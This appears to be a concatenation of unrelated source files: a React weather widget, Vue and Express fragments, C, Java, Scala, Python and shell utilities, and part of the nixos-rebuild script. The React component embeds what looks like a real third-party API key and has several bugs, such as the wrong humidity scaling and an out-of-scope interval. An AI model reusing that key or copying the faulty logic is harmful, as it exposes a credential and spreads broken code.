            res.json(recipe)
        } else {
            res.sendStatus(404)
        }
    } catch (error) {
        // BUG FIX: forward to the Express error handler instead of
        // swallowing the error and leaving the request hanging.
        next(error)
    }
})
|
import React from 'react';
import axios from 'axios';
import callApi from './apiUtils';
import Skycons from 'react-skycons';
class Weather extends React.Component {
constructor() {
super();
this.state = {
data : [],
city : "",
state : "",
lat : 0,
long : 0,
temp : 0,
icon : "",
humidity : 0,
dewpoint : 0,
visibility : "",
loading : true,
error : null
};
this._formatIcon = this._formatIcon.bind(this);
this._onSuccess = this._onSuccess.bind(this);
this._onFailure = this._onFailure.bind(this);
}
_formatIcon(icon) {
switch (icon) {
case "clear-day":
icon = "CLEAR_DAY";
break;
case "clear-night":
icon = "CLEAR_NIGHT";
break;
case "partly-cloudy-day":
icon = "PARTLY_CLOUDY_DAY";
break;
case "partly-cloudy-night":
icon = "PARTLY_CLOUDY_NIGHT";
break;
case "cloudy":
icon = "CLOUDY";
break;
case "rain":
icon = "RAIN";
break;
case "sleet":
icon = "SLEET";
break;
case "snow":
icon = "SNOW";
break;
case "wind":
icon = "WIND";
break;
case "fog":
icon = "FOG";
break;
default :
icon = "CLEAR_DAY";
break;
}
return icon;
}
_onSuccess(res) {
let data = res,
hourly = [],
temp = Math.round(res.currently.apparentTemperature) + '°',
icon = res.currently.icon,
humidity = Math.round(res.currently.humidity * 10) + '%',
dewpoint = Math.round(res.currently.dewPoint) + '°',
visibility = Math.round(res.currently.visibility * 0.621371) + ' miles',
wind = Math.round(res.currently.windSpeed * 2.23694) + ' MPH';
// Get hourly forecast
for(var i = 1; i < 4; i++) {
hourly[i] = {
time : new Date(1000 * res.hourly.data[i].time).getHours(),
temp : Math.round(res.hourly.data[i].temperature) + '°',
icon : res.hourly.data[i].icon
};
// Convert Icon names to the correct format
hourly[i].icon = this._formatIcon(icon);
// Append AM or PM to forecast times
hourly[i].time < 12 ? (hourly[i].time = hourly[i].time + " AM") : (hourly[i].time -= 12, hourly[i].time = hourly[i].time + " PM");
// format time
if (hourly[i].time === "0 AM") {
hourly[i].time = 12 + " AM";
} else if (hourly[i].time === "0 PM") {
hourly[i].time = 12 + " PM";
}
}
// Convert Icon names to the correct format
icon = this._formatIcon(icon);
// Update state to trigger a re-render.
// Clear any errors, and turn off the loading indiciator.
this.setState({
data,
temp,
icon,
humidity,
dewpoint,
visibility,
wind,
hourly,
loading : false,
error : null
});
}
_onFailure(error) {
let err = error;
this.setState({
loading : false,
error : err
});
}
_getWeather() {
axios.get("http://api.ipinfodb.com/v3/ip-city/?key=86be52d35c2a9476eae382805a6161756a0b2fd47514dcb31121e889bf4c53b5&format=json")
.then(res => {
let lat = res.data.latitude,
long = res.data.longitude,
city = res.data.cityName,
state = res.data.regionName;
// Update state to trigger a re-render.
// Clear any errors, and turn off the loading indiciator.
this.setState({
lat,
long,
city,
state
}, function(){
const url = `http://localhost:3000/api/darksky?latitude=${this.state.lat}&longitude=${this.state.long}`;
callApi(url, null, this._onSuccess, this._onFailure);
});
})
.catch(err => {
// Something went wrong. Save the error in state and re-render.
this.setState({
loading : false,
error : err
});
});
}
_forecast() {
if(this.state.error) {
return this._renderError();
}
return (
<div className="weather__container">
<div className="forecast">
<div className="forecast__header">
{this.state.city}, {this.state.state}
</div>
<div className="forecast__icon">
<Skycons color='white' icon={this.state.icon} autoplay={true} />
</div>
<div className="forecast__temp">
{this.state.temp}
</div>
</div>
<div className="weather__stats">
<ul className="weather__stats--list">
<li>
<span>Humidity</span>
<span>{this.state.humidity}</span>
</li>
<li>
<span>Wind</span>
<span>{this.state.wind}</span>
</li>
<li>
<span>Dewpoint</span>
<span>{this.state.dewpoint}</span>
</li>
<li>
<span>Visibility</span>
<span>{this.state.visibility}</span>
</li>
</ul>
<div className="weather__stats--forecast">
{this.state.hourly.map(hour =>
<div className="weather__stats--forecast-hour">
<span className="hour">{hour.time}</span>
<span className="icon">
<Skycons color='white' icon={hour.icon} autoplay={true} />
</span>
<span className="temp">{hour.temp}</span>
</div>
)}
</div>
</div>
</div>
);
}
_renderLoading() {
return <div className="loading">Loading...</div>;
}
_renderError() {
return (
<div className="error">
Uh oh: {this.state.error.message}
</div>
);
}
componentWillMount() {
this._getWeather();
}
componentDidMount() {
let weatherUpdate = setInterval(() => {
this._getWeather();
}, 120000);
}
componentWillUnmount() {
clearInterval(weatherUpdate);
}
render() {
return (
<div className="weather">
{this.state.loading ? this._renderLoading() : this._forecast() }
</div>
);
}
};
export default Weather; |
import Meta from 'vue-meta'
import VueRouter from 'vue-router'
import Vuex from 'vuex'
import compA from './vue/_template'
// Register the shared template component globally.
Vue.component('comp-a', compA)
/**
 * Router plugin (Usage: npm i -D vue-router)
 */
Vue.use(VueRouter)
/**
 * Store plugin (Usage: npm i -D vuex)
 */
Vue.use(Vuex)
/**
 * Meta plugin (Usage: npm i -D vue-meta)
 */
Vue.use(Meta)
// NOTE(review): `Vue` itself is never imported in this file — it must be a
// global (e.g. CDN build) or an `import Vue from 'vue'` is missing above.
const apps = new Vue({
  // BUG FIX: the `router` option must be a VueRouter instance; the original
  // passed a plain options object, which Vue silently ignores.
  router: new VueRouter({
    mode: 'history',
    routes: [
      {
        path: '',
        // BUG FIX: the original referenced an undefined `flogAbc` binding
        // (ReferenceError at load time). `compA` is the only component in
        // scope here — NOTE(review): confirm this is the intended view.
        components: { flogAbc: compA }
      }
    ],
    // Always scroll back to the top on navigation.
    scrollBehavior (to, from, savedPosition) {
      return { x: 0, y: 0 }
    }
  }),
  // BUG FIX: the Vuex constructor is `Vuex.Store` (capital S) — `Vuex.store`
  // is undefined and throws "Vuex.store is not a constructor" at runtime.
  store: new Vuex.Store({
    modules: {}
  }),
  // @see: https://github.com/declandewet/vue-meta
  metaInfo: {
    // "<page title> | hoge", or plain "hoge" when a page sets no title.
    titleTemplate: (chunk) => {
      return chunk ? `${chunk} | hoge` : 'hoge'
    }
  }
})
apps.$mount('#apps')
/**
 * The type of header being used.
 */
export enum HeaderType {
/** No header is shown. */
None,
/** A header containing plain text. */
Text,
/** A header rendered as a select control (inferred from the name — confirm). */
Select
}
#!/bin/bash
# Build/install script for the UCSC chainToPsl utility.
# NOTE(review): relies on $PREFIX being provided by the build environment
# (conda-build convention) — confirm the packaging context.
mkdir -p "$PREFIX/bin"
if [ "$(uname)" == "Darwin" ]; then
# macOS: a prebuilt chainToPsl binary is shipped alongside this script.
cp chainToPsl "$PREFIX/bin"
else
# Linux: build from the kent source tree.
export MACHTYPE=x86_64
export BINDIR=$(pwd)/bin
mkdir -p "$BINDIR"
# Build the libraries chainToPsl links against, then the tool itself.
(cd kent/src/lib && make)
(cd kent/src/htslib && make)
(cd kent/src/jkOwnLib && make)
(cd kent/src/hg/lib && make)
(cd kent/src/hg/mouseStuff/chainToPsl && make)
cp bin/chainToPsl "$PREFIX/bin"
fi
chmod +x "$PREFIX/bin/chainToPsl"
|
<filename>chap02/endian_test.c
#pragma clang diagnostic push
#pragma clang diagnostic ignored "-Wformat"
#pragma clang diagnostic ignored "-Wunknown-pragmas"
#pragma ide diagnostic ignored "UnreachableCode"
/*
* endian_test.c (c) 2018-20 <NAME>
*/
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
int main() {
    /* Probe value with a distinct byte at every position, so each printed
     * address unambiguously identifies which byte landed there. */
    uint64_t sonde = 0x0123456789ABCDEF;
    uint8_t lsb = sonde & 0xFF;
    uint8_t *bytes = (uint8_t *)&sonde;

    /* BUG FIX: use PRIx64 instead of %lx — where long is 32 bits, %lx with
     * a uint64_t argument is undefined behavior. %p also formally requires
     * a void* argument, hence the casts. */
    printf("Value 0x%" PRIx64 " is at address %p\n", sonde, (void *)&sonde);
    for (int i = (int)sizeof(sonde) - 1; i >= 0; i--) {
        printf("\t%p: %02x\n", (void *)(bytes + i), bytes[i]);
    }

    /* Empirical check: where did the least significant byte end up? */
    printf("Based on the location of the least significant byte, your processor is ");
    if (lsb == bytes[0]) {
        printf("little endian.\n");
    } else if (lsb == bytes[sizeof(sonde) - 1]) {
        printf("big endian.\n");
    } else {
        printf("neither big- nor little endian, perhaps multibyte-swapped little endian.\n");
    }

    /* Cross-check against the compiler's predefined byte-order macros
     * (GCC/Clang extension — see the pragmas guarding this file). */
    printf("Based on the pre-defined macros, your processor is ");
    int byte_order = __BYTE_ORDER__;
    switch (byte_order) {
    case __ORDER_LITTLE_ENDIAN__:
        printf("little endian.\n");
        break;
    case __ORDER_BIG_ENDIAN__:
        printf("big endian.\n");
        break;
    case __ORDER_PDP_ENDIAN__:
        printf("16bit-swapped little endian.\n");
        break;
    default:
        printf("neither big- nor little- nor pdp-endian.\n");
    }
    return 0; /* explicit, although C99 main() falls off the end as 0 */
}
#pragma clang diagnostic pop
|
/*
* Module : firefox/firefox-injected-compute.js
* Copyright : (c) 2011-2012, Galois, Inc.
*
* Maintainer :
* Stability : Provisional
* Portability: Not Portable (Firefox only)
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/**
 * Inject a stylesheet into the current document's <head>.
 * @param {!string} css The css to inject.
 */
var addGlobalStyle = function(css) {
    var head = document.getElementsByTagName('head')[0];
    if (!head) {
        // No <head> in the document — create one.
        // XXX this is perhaps not reliable?
        head = document.createElement('head');
        document.body.appendChild(head);
    }
    // Build the <style> element carrying the CSS text.
    var styleElement = document.createElement('style');
    styleElement.type = 'text/css';
    if (styleElement.styleSheet) {
        // Legacy (old IE) path: assign the CSS text directly.
        styleElement.styleSheet.cssText = css;
    } else {
        styleElement.appendChild(document.createTextNode(css));
    }
    head.appendChild(styleElement);
};
/**
 * Register the CSS-injection handler on the add-on messaging port and hand
 * the port back to the caller.
 * @return {{on: function(!string, function(*)), emit: function(!string, *)}}
 */
var obtainComputePort = function() {
    var computePort = self.port;
    computePort.on('injectCSS', addGlobalStyle);
    return computePort;
};
|
/*
Jameleon - An automation testing tool..
Copyright (C) 2006 <NAME> (<EMAIL>)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
package net.sf.jameleon.ant;
import java.io.File;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import org.apache.tools.ant.BuildException;
import org.apache.tools.ant.Task;
import org.apache.tools.ant.types.Parameter;
import net.sf.jameleon.util.GenSyntaxReference;
/**
* An Ant task that takes the registered FunctionalPoints and generates a syntax reference for each one.
*/
public class GenSyntaxReferenceTask extends Task{
protected File outputFile;
protected String plugin = "TestCaseTagDefs";
protected String templateName = "syntaxReference.txt";
protected List parameters;
public GenSyntaxReferenceTask(){
parameters = new ArrayList();
}
/**
* Adds a template parameter to be passed to the Velocity template
*
* @param parameter a name/value parameter.
*/
public void addTemplateParam(Parameter parameter){
parameters.add(parameter);
}
/**
* Sets the name of the file, not including path of the template to use. Defaults to 'syntaxReference.txt'.
* @param templateName - the name of the file, not including path of the template to use.
* NOTE: This fileName is loaded from the CLASSPATH.
*/
public void setTemplateName(String templateName){
this.templateName = templateName;
}
/**
* Sets the plugin to generate the syntax reference from. Defaults to TestCaseTagDefs
* @param plugin - the plugin to generate the syntax reference from. For the htmlunit-plugin, pass in 'htmlunit-plugin'.
*/
public void setPlugin(String plugin){
this.plugin = plugin;
}
/**
* Set the file where the syntax reference will be generated.
* @param fileName - The name of the file.
*/
public void setOutputFile(File fileName){
outputFile = fileName;
}
/**
* Jameleon's implementation of Task.execute().
*
* @exception BuildException Ant's way of reporting exception
*/
public final void execute() throws BuildException {
if (outputFile == null) {
outputFile = new File(getProject().getBaseDir(), "xdocs/syntax-reference.xml");
}
if (plugin == null) {
throw new BuildException("plugin must be set!");
}
Map params = new HashMap();
GenSyntaxReference generator = new GenSyntaxReference();
if (parameters != null) {
Iterator it = parameters.iterator();
Parameter param;
while (it.hasNext()) {
param = (Parameter)it.next();
params.put(param.getName(), param.getValue());
}
}
try{
System.out.println("Generating "+outputFile.getAbsolutePath());
generator.genReferenceForPlugin(plugin, templateName, outputFile, params);
}catch(Exception e){
e.printStackTrace();
throw new BuildException("An error occured while generating the syntax reference file: "+e.getMessage(), e);
}
}
}
|
/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
package org.fhwa.c2cri.testprocedures.ntcip2306;
import java.sql.ResultSet;
import java.util.ArrayList;
import tmddv3verification.utilities.TMDDDatabase;
/**
*
* @author TransCore ITS
*/
public class NTCIP2306Specifications {
// Every mandatory specification row, loaded once at construction time.
private ArrayList<NTCIP2306Specification> SpecificationsList = new ArrayList<NTCIP2306Specification>();
// Lazily created singleton instance.
private static NTCIP2306Specifications ntcip2306_nrtm_RTM_Spec;
// Returns the shared instance, loading the database on first use.
// NOTE(review): not thread-safe — acceptable only if callers are
// single-threaded; confirm before using from multiple threads.
public static NTCIP2306Specifications getInstance() {
if (ntcip2306_nrtm_RTM_Spec == null) {
ntcip2306_nrtm_RTM_Spec = new NTCIP2306Specifications();
}
return ntcip2306_nrtm_RTM_Spec;
}
// Loads every Mandatory='T' row of NTCIP2306ProcedureDetailsUpdatedTable
// into SpecificationsList. Private: use getInstance() (main() below
// constructs directly for ad-hoc testing).
private NTCIP2306Specifications() {
TMDDDatabase theDatabase = new TMDDDatabase();
theDatabase.connectToDatabase();
ResultSet wSDLStepDescriptionRS = theDatabase.queryReturnRS("SELECT * FROM NTCIP2306ProcedureDetailsUpdatedTable "
+ "WHERE (Mandatory='T')");
// "WHERE ((Mandatory='T') AND(InStr([PrimaryTarget],'WSDL')>0))");
try {
// Copy each column of every row into a new specification object.
while (wSDLStepDescriptionRS.next()) {
String rqmtID = wSDLStepDescriptionRS.getString("RqmtID");
String requirementDescription = wSDLStepDescriptionRS.getString("requirementDescription");
String section = wSDLStepDescriptionRS.getString("Section");
String prlTraceID = wSDLStepDescriptionRS.getString("2306PRLTraceID");
String profile = wSDLStepDescriptionRS.getString("Profile");
String mandatory = wSDLStepDescriptionRS.getString("Mandatory");
String primaryTarget = wSDLStepDescriptionRS.getString("PrimaryTarget");
String verificationTime = wSDLStepDescriptionRS.getString("VerificationTime");
String verificationApproach = wSDLStepDescriptionRS.getString("VerificationApproach");
String preconditionAssertion = wSDLStepDescriptionRS.getString("PreconditionAssertion");
String testSteps = wSDLStepDescriptionRS.getString("TestSteps");
String subRequirements = wSDLStepDescriptionRS.getString("SubRequirements");
String scriptText = wSDLStepDescriptionRS.getString("ScriptText");
String xPathText = wSDLStepDescriptionRS.getString("XPathText");
String xslTarget = wSDLStepDescriptionRS.getString("XSLTarget");
String xslPredicate = wSDLStepDescriptionRS.getString("XSLPredicate");
NTCIP2306Specification thisWSDLStepDescription = new NTCIP2306Specification();
thisWSDLStepDescription.setRqmtID(rqmtID);
thisWSDLStepDescription.setRequirementDescription(requirementDescription);
thisWSDLStepDescription.setSection(section);
thisWSDLStepDescription.setpRLTraceID(prlTraceID);
thisWSDLStepDescription.setProfile(profile);
thisWSDLStepDescription.setMandatory(mandatory);
thisWSDLStepDescription.setPrimaryTarget(primaryTarget);
thisWSDLStepDescription.setVerificationTime(verificationTime);
thisWSDLStepDescription.setVerificationApproach(verificationApproach);
thisWSDLStepDescription.setPreconditionAssertion(preconditionAssertion);
thisWSDLStepDescription.setTestSteps(testSteps);
thisWSDLStepDescription.setSubRequirments(subRequirements);
thisWSDLStepDescription.setScriptText(scriptText);
thisWSDLStepDescription.setxPathText(xPathText);
thisWSDLStepDescription.setXslTarget(xslTarget);
thisWSDLStepDescription.setXslPredicate(xslPredicate);
SpecificationsList.add(thisWSDLStepDescription);
}
wSDLStepDescriptionRS.close();
wSDLStepDescriptionRS = null;
} catch (Exception ex) {
// NOTE(review): failures are only printed; the instance is still created
// with a partially loaded (possibly empty) list.
ex.printStackTrace();
}
theDatabase.disconnectFromDatabase();
// TODO code application logic here
System.out.println("Number of WSDL Step Descriptions Added = " + SpecificationsList.size());
}
// Rows whose Profile equals `profile` AND whose PrimaryTarget contains
// `target` (substring match).
public ArrayList<NTCIP2306Specification> getProfileSpecifications(String profile, String target) {
ArrayList<NTCIP2306Specification> returnList = new ArrayList<NTCIP2306Specification>();
for (NTCIP2306Specification thisStepDescription : SpecificationsList) {
if ((thisStepDescription.getProfile() != null) && thisStepDescription.getProfile().equals(profile)) {
if ((thisStepDescription.getPrimaryTarget() != null) && thisStepDescription.getPrimaryTarget().contains(target)) {
returnList.add(thisStepDescription);
}
}
}
return returnList;
}
// Requirement ids of every WSDL-targeted row.
public ArrayList<String> getWSDLRequirements() {
ArrayList<String> returnList = new ArrayList<String>();
//There's only one procedure for WSDL so send back all requirements
for (NTCIP2306Specification thisStepDescription : SpecificationsList) {
if ((thisStepDescription.getPrimaryTarget() != null) && thisStepDescription.getPrimaryTarget().contains(NTCIP2306Parameters.NTCIP2306_WSDL_TARGET)) {
returnList.add(thisStepDescription.getRqmtID());
}
}
return returnList;
}
// Full specification objects of every WSDL-targeted row.
public ArrayList<NTCIP2306Specification> getWSDLSpecifications() {
ArrayList<NTCIP2306Specification> returnList = new ArrayList<NTCIP2306Specification>();
//There's only one procedure for WSDL so send back all requirements
for (NTCIP2306Specification thisSpecification : SpecificationsList) {
if ((thisSpecification.getPrimaryTarget() != null) && thisSpecification.getPrimaryTarget().contains(NTCIP2306Parameters.NTCIP2306_WSDL_TARGET)) {
returnList.add(thisSpecification);
}
}
return returnList;
}
// Requirement ids for `target`, but only when target is WSDL-related.
// NOTE(review): the `profile` and `centerMode` parameters are currently
// ignored — confirm whether filtering on them was intended.
public ArrayList<String> getRequirements(String target, String profile, String centerMode) {
ArrayList<String> returnList = new ArrayList<String>();
//There's only one procedure for WSDL so send back all requirements
if (target.contains(NTCIP2306Parameters.NTCIP2306_WSDL_TARGET)) {
for (NTCIP2306Specification thisStepDescription : SpecificationsList) {
if ((thisStepDescription.getPrimaryTarget() != null) && thisStepDescription.getPrimaryTarget().contains(target)) {
returnList.add(thisStepDescription.getRqmtID());
}
}
}
return returnList;
}
// Ad-hoc smoke test exercising getProfileSpecifications against the DB.
public static void main(String[] args) {
// Test Out this Class
ArrayList<NTCIP2306Specification> responseList;
NTCIP2306Specifications firstOne = new NTCIP2306Specifications();
System.out.println("Sent General, WSDL");
responseList = firstOne.getProfileSpecifications("General", "WSDL");
printResult(responseList);
responseList.clear();
System.out.println("Sent General, Message");
responseList = firstOne.getProfileSpecifications("General", "Message");
printResult(responseList);
responseList.clear();
System.out.println("Sent SOAP,WSDL");
responseList = firstOne.getProfileSpecifications("SOAP", "WSDL");
printResult(responseList);
responseList.clear();
}
// Prints each returned requirement id (or a "nothing returned" marker).
public static void printResult(ArrayList<NTCIP2306Specification> reportList) {
if (reportList.size() == 0) {
System.out.println("Nothing returned!!");
} else {
for (NTCIP2306Specification thisWSDLStep : reportList) {
System.out.println("Returned " + thisWSDLStep.getRqmtID());
}
}
}
}
|
/* - Coeus web framework -------------------------
*
* Licensed under the Apache License, Version 2.0.
*
* Author: <NAME>
*/
package com.tzavellas.coeus.validation.bean
import java.util.Locale
import org.junit.Test
import org.junit.Assert._
import com.tzavellas.coeus.bind.{ BindingResult, Error }
import com.tzavellas.coeus.i18n.msg.MessageBundle
class BeanErrorFormatterTest {
// Binding (type-mismatch) errors carry only a message code; formatting must
// resolve them through the MessageBundle ("int.type-mismatch" here).
@Test
def binding_errors_are_resolved_using_the_message_bundle() {
val notInt = Error.typeMismatch("age", classOf[Int], "five")
assertEquals("Not an Int", format(notInt))
}
// Validation (JSR-303) errors arrive pre-formatted, so the formatter must
// return the message verbatim without consulting the bundle.
@Test
def validation_errors_are_already_formatted_by_the_jsr303_impl() {
val error = Error("the error message")
assertEquals("the error message", format(error))
}
// Helper: format with the stub bundle; result/locale arguments are unused
// by these cases, hence the nulls.
def format(error: Error) = BeanErrorFormatter.format(error, null, messages, null)
// Minimal MessageBundle stub backed by an in-memory map.
object messages extends MessageBundle {
val msgs = Map("int.type-mismatch" -> "Not an Int")
def apply(locale: Locale, code: String, args: Any*) = msgs.apply(code)
def get(locale: Locale, code: String, args: Any*) = msgs.get(code)
}
}
|
/**
 * Compute the n-th Fibonacci number (fib(0) = 0, fib(1) = 1).
 *
 * BUG FIX: the original recursed without validating `n`, so a negative or
 * non-integer argument recursed past the memo table until the call stack
 * overflowed. This version validates input and iterates in O(n) time and
 * O(1) space (also avoiding one stack frame per index for large n).
 *
 * @param {number} n non-negative integer index.
 * @returns {number} the n-th Fibonacci number.
 * @throws {RangeError} when n is negative or not an integer.
 */
function fibonacci(n) {
    if (!Number.isInteger(n) || n < 0) {
        throw new RangeError("fibonacci: n must be a non-negative integer");
    }
    let prev = 0;
    let curr = 1;
    for (let i = 0; i < n; i++) {
        [prev, curr] = [curr, prev + curr];
    }
    return prev;
}
The search engine should be built on an index data structure, such as a trie or a hash table, that stores every word found on the website. The engine first scans the site and records all of its words in this index. When a user enters a query, it looks up each query word in the index and returns the matching results. The search engine should also rank results for relevance, for example using PageRank or term frequency–inverse document frequency (TF–IDF).
#!/bin/sh
# Container entrypoint: prepare the PHP application (artisan is Laravel's
# CLI), then hand off to supervisord as the long-running foreground process.
umask 0000
cd /var/www
# php artisan migrate:fresh --seed
php artisan cache:clear
php artisan route:cache
php artisan storage:link
#php artisan migrate
#php artisan schedule:work
# supervisord stays in the foreground and supervises the app processes.
/usr/bin/supervisord -c /etc/supervisord.conf
|
from urllib.parse import urlparse, parse_qs
class URLRequest:
    """Convenience wrapper around :func:`urllib.parse.urlparse` exposing
    request-style accessors (host, path, query params, ...)."""

    def __init__(self):
        # Parsed URL (urllib.parse.ParseResult), or None until a URL is set.
        self._url = None

    @property
    def url(self):
        """The full URL string, or None when no URL has been set."""
        if self._url:
            return self._url.geturl()
        return None

    @url.setter
    def url(self, value):
        self._url = urlparse(value)

    @property
    def host(self):
        """``hostname:port``, or just ``hostname`` when the URL carries no
        explicit port.

        BUG FIX: the original always interpolated the port and rendered a
        literal ``"example.com:None"`` for port-less URLs.
        """
        if self._url:
            if self._url.port is None:
                return self._url.hostname
            return f"{self._url.hostname}:{self._url.port}"
        return None

    @property
    def hostname(self):
        """Hostname without the port, or None."""
        if self._url:
            return self._url.hostname
        return None

    @property
    def domain(self):
        return self.hostname  # Alias for hostname

    @property
    def path(self):
        """URL path component, or None."""
        if self._url:
            return self._url.path
        return None

    @property
    def port(self):
        """Explicit port as an int, or None when absent or no URL is set."""
        if self._url:
            return self._url.port
        return None

    @property
    def args(self):
        """Query parameters as ``{name: [values]}``, or None when no URL is
        set (the original's implicit None fall-through made explicit)."""
        if self._url:
            return parse_qs(self._url.query)
        return None

    @property
    def params(self):
        return self.args  # Alias for args

    @property
    def query_params(self):
        return self.args  # Alias for args

    @property
    def GET(self):
        return self.args  # Alias for args

    @property
    def query_string(self):
        """Raw query string, or None."""
        if self._url:
            return self._url.query
        return None

    def set_url(self, url):
        """Imperative alternative to the ``url`` property setter."""
        self._url = urlparse(url)

    def get_url(self):
        # NOTE(review): returns the ParseResult object, not the URL string —
        # inconsistent with the `url` property, but kept as-is for backward
        # compatibility with existing callers.
        return self._url
<reponame>EgorSoroka/job4j
package ru.job4j.figures;
/**
* Рисует квадрат.
* @author <NAME> ( https://vk.com/id428714363)
* @version 1.0
* @since 19.06.19
*/
public class Square implements Shape {

    /** Side length, in '+' characters, of the rendered square. */
    private static final int SIDE = 4;

    /**
     * Renders the square as four newline-terminated rows of four plus signs.
     *
     * @return the ASCII-art square.
     */
    @Override
    public String draw() {
        StringBuilder out = new StringBuilder();
        for (int row = 0; row < SIDE; row++) {
            for (int col = 0; col < SIDE; col++) {
                out.append('+');
            }
            out.append('\n');
        }
        return out.toString();
    }
}
|
#! @runtimeShell@
if [ -x "@runtimeShell@" ]; then export SHELL="@runtimeShell@"; fi;
set -e
set -o pipefail
export PATH=@path@:$PATH
# Show the manual page and stop; used for --help and usage errors.
showSyntax() {
exec man nixos-rebuild
# Unreachable unless exec itself fails.
exit 1
}
# Parse the command line.
origArgs=("$@")
# Flags forwarded verbatim to nix build/eval invocations.
extraBuildFlags=()
# Flake lock-file handling flags (--recreate-lock-file and friends).
lockFlags=()
flakeFlags=()
action=
# Rebuild nix itself before building the system unless --no-build-nix/--fast.
buildNix=1
fast=
rollback=
upgrade=
upgrade_all=
repair=
# System profile to update; overridable with --profile-name.
profile=/nix/var/nix/profiles/system
buildHost=
targetHost=
maybeSudo=()
# Consume the argument list; unrecognized options abort with an error.
while [ "$#" -gt 0 ]; do
i="$1"; shift 1
case "$i" in
--help)
showSyntax
;;
# The action verb (one expected); dry-run is a legacy alias of dry-build.
switch|boot|test|build|edit|dry-build|dry-run|dry-activate|build-vm|build-vm-with-bootloader)
if [ "$i" = dry-run ]; then i=dry-build; fi
action="$i"
;;
--install-grub)
echo "$0: --install-grub deprecated, use --install-bootloader instead" >&2
export NIXOS_INSTALL_BOOTLOADER=1
;;
--install-bootloader)
export NIXOS_INSTALL_BOOTLOADER=1
;;
--no-build-nix)
buildNix=
;;
--rollback)
rollback=1
;;
--upgrade)
upgrade=1
;;
--upgrade-all)
upgrade=1
upgrade_all=1
;;
# --repair is both a local mode flag and forwarded to nix.
--repair)
repair=1
extraBuildFlags+=("$i")
;;
# nix options that take one argument, forwarded verbatim.
--max-jobs|-j|--cores|-I|--builders)
j="$1"; shift 1
extraBuildFlags+=("$i" "$j")
;;
# Zero-argument nix flags, forwarded verbatim.
--show-trace|--keep-failed|-K|--keep-going|-k|--verbose|-v|-vv|-vvv|-vvvv|-vvvvv|--fallback|--repair|--no-build-output|-Q|-j*|-L|--refresh|--no-net)
extraBuildFlags+=("$i")
;;
# --option takes two arguments (name value).
--option)
j="$1"; shift 1
k="$1"; shift 1
extraBuildFlags+=("$i" "$j" "$k")
;;
# --fast: skip rebuilding nix and always show evaluation traces.
--fast)
buildNix=
fast=1
extraBuildFlags+=(--show-trace)
;;
--profile-name|-p)
if [ -z "$1" ]; then
echo "$0: ‘--profile-name’ requires an argument"
exit 1
fi
# "system" is the default profile; anything else lives under system-profiles/.
if [ "$1" != system ]; then
profile="/nix/var/nix/profiles/system-profiles/$1"
mkdir -p -m 0755 "$(dirname "$profile")"
fi
shift 1
;;
# NOTE(review): the bare "h"/"t" alternatives (not "-h"/"-t") look like
# typos for short options — confirm against the manual before changing.
--build-host|h)
buildHost="$1"
shift 1
;;
--target-host|t)
targetHost="$1"
shift 1
;;
--use-remote-sudo)
maybeSudo=(sudo --)
;;
# Flake mode: requires the experimental nix CLI features.
--flake)
flake="$1"
flakeFlags=(--experimental-features 'nix-command flakes')
shift 1
;;
--recreate-lock-file|--no-update-lock-file|--no-write-lock-file|--no-registries|--commit-lock-file)
lockFlags+=("$i")
;;
--update-input)
j="$1"; shift 1
lockFlags+=("$i" "$j")
;;
# --override-input takes two arguments (input flake-ref).
--override-input)
j="$1"; shift 1
k="$1"; shift 1
lockFlags+=("$i" "$j" "$k")
;;
*)
echo "$0: unknown option \`$i'"
exit 1
;;
esac
done
if [ -n "$SUDO_USER" ]; then
maybeSudo=(sudo --)
fi
if [ -z "$buildHost" -a -n "$targetHost" ]; then
buildHost="$targetHost"
fi
if [ "$targetHost" = localhost ]; then
targetHost=
fi
if [ "$buildHost" = localhost ]; then
buildHost=
fi
buildHostCmd() {
if [ -z "$buildHost" ]; then
"$@"
elif [ -n "$remoteNix" ]; then
ssh $SSHOPTS "$buildHost" env PATH="$remoteNix:$PATH" "${maybeSudo[@]}" "$@"
else
ssh $SSHOPTS "$buildHost" "${maybeSudo[@]}" "$@"
fi
}
targetHostCmd() {
if [ -z "$targetHost" ]; then
"${maybeSudo[@]}" "$@"
else
ssh $SSHOPTS "$targetHost" "${maybeSudo[@]}" "$@"
fi
}
copyToTarget() {
if ! [ "$targetHost" = "$buildHost" ]; then
if [ -z "$targetHost" ]; then
NIX_SSHOPTS=$SSHOPTS nix-copy-closure --from "$buildHost" "$1"
elif [ -z "$buildHost" ]; then
NIX_SSHOPTS=$SSHOPTS nix-copy-closure --to "$targetHost" "$1"
else
buildHostCmd nix-copy-closure --to "$targetHost" "$1"
fi
fi
}
# nix-build wrapper that supports building on a remote $buildHost:
# instantiate locally, copy the .drv closure over, then realise it remotely.
nixBuild() {
if [ -z "$buildHost" ]; then
nix-build "$@"
else
local instArgs=()
local buildArgs=()
# Split the nix-build arguments into instantiation vs. realisation args.
while [ "$#" -gt 0 ]; do
local i="$1"; shift 1
case "$i" in
-o)
local out="$1"; shift 1
buildArgs+=("--add-root" "$out" "--indirect")
;;
-A)
local j="$1"; shift 1
instArgs+=("$i" "$j")
;;
-I) # We don't want this in buildArgs
shift 1
;;
--no-out-link) # We don't want this in buildArgs
;;
"<"*) # nix paths
instArgs+=("$i")
;;
*)
buildArgs+=("$i")
;;
esac
done
local drv="$(nix-instantiate "${instArgs[@]}" "${extraBuildFlags[@]}")"
if [ -a "$drv" ]; then
NIX_SSHOPTS=$SSHOPTS nix-copy-closure --to "$buildHost" "$drv"
buildHostCmd nix-store -r "$drv" "${buildArgs[@]}"
else
echo "nix-instantiate failed"
exit 1
fi
fi
}
